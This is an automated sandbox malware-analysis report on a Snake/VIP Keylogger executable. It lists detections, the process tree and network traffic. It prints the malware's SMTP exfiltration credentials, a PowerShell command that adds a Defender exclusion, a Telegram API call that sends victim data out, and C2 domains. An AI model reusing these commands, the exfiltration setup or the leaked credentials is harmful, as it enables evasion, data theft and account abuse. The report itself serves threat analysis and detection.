Edit tour

Windows Analysis Report
hesaphareketi-01.exe

Overview

General Information

Sample name:	hesaphareketi-01.exe
Analysis ID:	1524785
MD5:	1a2030277b88a72feac4f57f6514494a
SHA1:	29858e377f52ba70fad5d3f24c30e2264d96ea96
SHA256:	c387b91dd56a4b66da4582e26ebc0c5a473e37251fb44650fc62d6d4749d5c8c
Tags:	exegeoSnakeKeyloggerTURuser-abuse_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Outbound SMTP Connections

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

hesaphareketi-01.exe (PID: 5860 cmdline: "C:\Users\user\Desktop\hesaphareketi-01.exe" MD5: 1A2030277B88A72FEAC4F57F6514494A)

powershell.exe (PID: 3968 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 1528 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

hesaphareketi-01.exe (PID: 5508 cmdline: "C:\Users\user\Desktop\hesaphareketi-01.exe" MD5: 1A2030277B88A72FEAC4F57F6514494A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "satis@obaambalaj.com.tr", "Password": "Beyza2022", "Host": "mail.obaambalaj.com.tr", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "satis@obaambalaj.com.tr", "Password": "Beyza2022", "Host": "mail.obaambalaj.com.tr", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.3895077200.0000000002E74000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dd80:$a1: get_encryptedPassword 0x2e09d:$a2: get_encryptedUsername 0x2db90:$a3: get_timePasswordChanged 0x2dc99:$a4: get_passwordField 0x2dd96:$a5: set_encryptedPassword 0x2f40e:$a7: get_logins 0x2f371:$a10: KeyLoggerEventArgs 0x2efd6:$a11: KeyLoggerEventArgsEventHandler
00000004.00000002.3895077200.0000000002E27000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.3895077200.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xbed10:$a1: get_encryptedPassword 0x102530:$a1: get_encryptedPassword 0x25b2f0:$a1: get_encryptedPassword 0xbf02d:$a2: get_encryptedUsername 0x10284d:$a2: get_encryptedUsername 0x25b60d:$a2: get_encryptedUsername 0xbeb20:$a3: get_timePasswordChanged 0x102340:$a3: get_timePasswordChanged 0x25b100:$a3: get_timePasswordChanged 0xbec29:$a4: get_passwordField 0x102449:$a4: get_passwordField 0x25b209:$a4: get_passwordField 0xbed26:$a5: set_encryptedPassword 0x102546:$a5: set_encryptedPassword 0x25b306:$a5: set_encryptedPassword 0xc039e:$a7: get_logins 0x103bbe:$a7: get_logins 0x25c97e:$a7: get_logins 0xc0301:$a10: KeyLoggerEventArgs 0x103b21:$a10: KeyLoggerEventArgs 0x25c8e1:$a10: KeyLoggerEventArgs
Process Memory Space: hesaphareketi-01.exe PID: 5860	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: hesaphareketi-01.exe PID: 5860	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: hesaphareketi-01.exe PID: 5860	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: hesaphareketi-01.exe PID: 5860	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: hesaphareketi-01.exe PID: 5860	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x45978:$a1: get_encryptedPassword 0x45c8b:$a2: get_encryptedUsername 0x45792:$a3: get_timePasswordChanged 0x4589b:$a4: get_passwordField 0x4598e:$a5: set_encryptedPassword 0x47e40:$a7: get_logins 0x47da3:$a10: KeyLoggerEventArgs 0x47a0c:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: hesaphareketi-01.exe PID: 5508	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: hesaphareketi-01.exe PID: 5508	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: hesaphareketi-01.exe PID: 5508	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: hesaphareketi-01.exe PID: 5508	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x157ac2:$a1: get_encryptedPassword 0x157dd5:$a2: get_encryptedUsername 0x1578dc:$a3: get_timePasswordChanged 0x1579e5:$a4: get_passwordField 0x157ad8:$a5: set_encryptedPassword 0x159f8a:$a7: get_logins 0x159eed:$a10: KeyLoggerEventArgs 0x159b56:$a11: KeyLoggerEventArgsEventHandler
Click to see the 15 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.hesaphareketi-01.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.hesaphareketi-01.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.2.hesaphareketi-01.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
4.2.hesaphareketi-01.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
4.2.hesaphareketi-01.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2df80:$a1: get_encryptedPassword 0x2e29d:$a2: get_encryptedUsername 0x2dd90:$a3: get_timePasswordChanged 0x2de99:$a4: get_passwordField 0x2df96:$a5: set_encryptedPassword 0x2f60e:$a7: get_logins 0x2f571:$a10: KeyLoggerEventArgs 0x2f1d6:$a11: KeyLoggerEventArgsEventHandler
4.2.hesaphareketi-01.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3bd9a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b43d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b69a:$a4: \Orbitum\User Data\Default\Login Data 0x3c079:$a5: \Kometa\User Data\Default\Login Data
4.2.hesaphareketi-01.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2eb7e:$s1: UnHook 0x2eb85:$s2: SetHook 0x2eb8d:$s3: CallNextHook 0x2eb9a:$s4: _hook
0.2.hesaphareketi-01.exe.477ad90.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.hesaphareketi-01.exe.477ad90.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.hesaphareketi-01.exe.477ad90.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.hesaphareketi-01.exe.477ad90.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c180:$a1: get_encryptedPassword 0x2c49d:$a2: get_encryptedUsername 0x2bf90:$a3: get_timePasswordChanged 0x2c099:$a4: get_passwordField 0x2c196:$a5: set_encryptedPassword 0x2d80e:$a7: get_logins 0x2d771:$a10: KeyLoggerEventArgs 0x2d3d6:$a11: KeyLoggerEventArgsEventHandler
0.2.hesaphareketi-01.exe.477ad90.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39f9a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3963d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3989a:$a4: \Orbitum\User Data\Default\Login Data 0x3a279:$a5: \Kometa\User Data\Default\Login Data
0.2.hesaphareketi-01.exe.477ad90.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2cd7e:$s1: UnHook 0x2cd85:$s2: SetHook 0x2cd8d:$s3: CallNextHook 0x2cd9a:$s4: _hook
0.2.hesaphareketi-01.exe.4917370.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.hesaphareketi-01.exe.4917370.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.hesaphareketi-01.exe.4917370.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.hesaphareketi-01.exe.4917370.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c180:$a1: get_encryptedPassword 0x2c49d:$a2: get_encryptedUsername 0x2bf90:$a3: get_timePasswordChanged 0x2c099:$a4: get_passwordField 0x2c196:$a5: set_encryptedPassword 0x2d80e:$a7: get_logins 0x2d771:$a10: KeyLoggerEventArgs 0x2d3d6:$a11: KeyLoggerEventArgsEventHandler
0.2.hesaphareketi-01.exe.4917370.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39f9a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3963d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3989a:$a4: \Orbitum\User Data\Default\Login Data 0x3a279:$a5: \Kometa\User Data\Default\Login Data
0.2.hesaphareketi-01.exe.4917370.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2cd7e:$s1: UnHook 0x2cd85:$s2: SetHook 0x2cd8d:$s3: CallNextHook 0x2cd9a:$s4: _hook
0.2.hesaphareketi-01.exe.4917370.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.hesaphareketi-01.exe.4917370.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.hesaphareketi-01.exe.4917370.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.hesaphareketi-01.exe.4917370.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.hesaphareketi-01.exe.4917370.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2df80:$a1: get_encryptedPassword 0x2e29d:$a2: get_encryptedUsername 0x2dd90:$a3: get_timePasswordChanged 0x2de99:$a4: get_passwordField 0x2df96:$a5: set_encryptedPassword 0x2f60e:$a7: get_logins 0x2f571:$a10: KeyLoggerEventArgs 0x2f1d6:$a11: KeyLoggerEventArgsEventHandler
0.2.hesaphareketi-01.exe.4917370.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2eb7e:$s1: UnHook 0x2eb85:$s2: SetHook 0x2eb8d:$s3: CallNextHook 0x2eb9a:$s4: _hook
0.2.hesaphareketi-01.exe.477ad90.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.hesaphareketi-01.exe.477ad90.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.hesaphareketi-01.exe.477ad90.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.hesaphareketi-01.exe.477ad90.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.hesaphareketi-01.exe.477ad90.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2df80:$a1: get_encryptedPassword 0x717a0:$a1: get_encryptedPassword 0x1ca560:$a1: get_encryptedPassword 0x2e29d:$a2: get_encryptedUsername 0x71abd:$a2: get_encryptedUsername 0x1ca87d:$a2: get_encryptedUsername 0x2dd90:$a3: get_timePasswordChanged 0x715b0:$a3: get_timePasswordChanged 0x1ca370:$a3: get_timePasswordChanged 0x2de99:$a4: get_passwordField 0x716b9:$a4: get_passwordField 0x1ca479:$a4: get_passwordField 0x2df96:$a5: set_encryptedPassword 0x717b6:$a5: set_encryptedPassword 0x1ca576:$a5: set_encryptedPassword 0x2f60e:$a7: get_logins 0x72e2e:$a7: get_logins 0x1cbbee:$a7: get_logins 0x2f571:$a10: KeyLoggerEventArgs 0x72d91:$a10: KeyLoggerEventArgs 0x1cbb51:$a10: KeyLoggerEventArgs
0.2.hesaphareketi-01.exe.477ad90.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2eb7e:$s1: UnHook 0x7239e:$s1: UnHook 0x1cb15e:$s1: UnHook 0x2eb85:$s2: SetHook 0x723a5:$s2: SetHook 0x1cb165:$s2: SetHook 0x2eb8d:$s3: CallNextHook 0x723ad:$s3: CallNextHook 0x1cb16d:$s3: CallNextHook 0x2eb9a:$s4: _hook 0x723ba:$s4: _hook 0x1cb17a:$s4: _hook
Click to see the 26 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\hesaphareketi-01.exe", ParentImage: C:\Users\user\Desktop\hesaphareketi-01.exe, ParentProcessId: 5860, ParentProcessName: hesaphareketi-01.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe", ProcessId: 3968, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DesusertionIp: 77.245.159.27, DesusertionIsIpv6: false, DesusertionPort: 587, EventID: 3, Image: C:\Users\user\Desktop\hesaphareketi-01.exe, Initiated: true, ProcessId: 5508, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49733

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\hesaphareketi-01.exe", ParentImage: C:\Users\user\Desktop\hesaphareketi-01.exe, ParentProcessId: 5860, ParentProcessName: hesaphareketi-01.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe", ProcessId: 3968, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T09:11:23.282454+0200	2803305	3	Unknown Traffic	192.168.2.9	49710	188.114.96.3	443	TCP
2024-10-03T09:11:27.310384+0200	2803305	3	Unknown Traffic	192.168.2.9	49716	188.114.96.3	443	TCP
2024-10-03T09:11:33.568265+0200	2803305	3	Unknown Traffic	192.168.2.9	49728	188.114.96.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T09:11:21.166324+0200	2803274	2	Potentially Bad Traffic	192.168.2.9	49708	193.122.6.168	80	TCP
2024-10-03T09:11:22.697559+0200	2803274	2	Potentially Bad Traffic	192.168.2.9	49708	193.122.6.168	80	TCP
2024-10-03T09:11:23.933420+0200	2803274	2	Potentially Bad Traffic	192.168.2.9	49712	193.122.6.168	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://aborters.duckdns.org:8081	URL Reputation: Label: malware
Source: http://anotherarmy.dns.army:8081	URL Reputation: Label: malware

Found malware configuration

Source: 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "satis@obaambalaj.com.tr", "Password": "Beyza2022", "Host": "mail.obaambalaj.com.tr", "Port": "587", "Version": "4.4"}
Source: 0.2.hesaphareketi-01.exe.4917370.0.raw.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "satis@obaambalaj.com.tr", "Password": "Beyza2022", "Host": "mail.obaambalaj.com.tr", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for submitted file

Source: hesaphareketi-01.exe	ReversingLabs: Detection: 23%
Source: hesaphareketi-01.exe	Virustotal: Detection: 60%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: hesaphareketi-01.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: hesaphareketi-01.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49709 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49732 version: TLS 1.2

Source: hesaphareketi-01.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: tEaO.pdbSHA256 source: hesaphareketi-01.exe
Source:	Binary string: tEaO.pdb source: hesaphareketi-01.exe

Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4x nop then jmp 06F6C86Fh	0_2_06F6C0F8
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4x nop then jmp 06F6C86Fh	0_2_06F6C09A
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4x nop then jmp 011DF475h	4_2_011DF2D8
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4x nop then jmp 011DF475h	4_2_011DF545
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4x nop then jmp 011DF475h	4_2_011DF4C4
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4x nop then jmp 011DFC31h	4_2_011DF979

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 4.2.hesaphareketi-01.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.hesaphareketi-01.exe.4917370.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.hesaphareketi-01.exe.477ad90.3.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.9:49733 -> 77.245.159.27:587

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:581804%0D%0ADate%20and%20Time:%2003/10/2024%20/%2019:12:44%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20581804%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 193.122.6.168 193.122.6.168

Source: Joe Sandbox View	ASN Name: NIOBEBILISIMHIZMETLERITR NIOBEBILISIMHIZMETLERITR
Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49712 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49708 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49710 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49716 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49728 -> 188.114.96.3:443

Source: global traffic

TCP traffic: 192.168.2.9:49733 -> 77.245.159.27:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49709 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
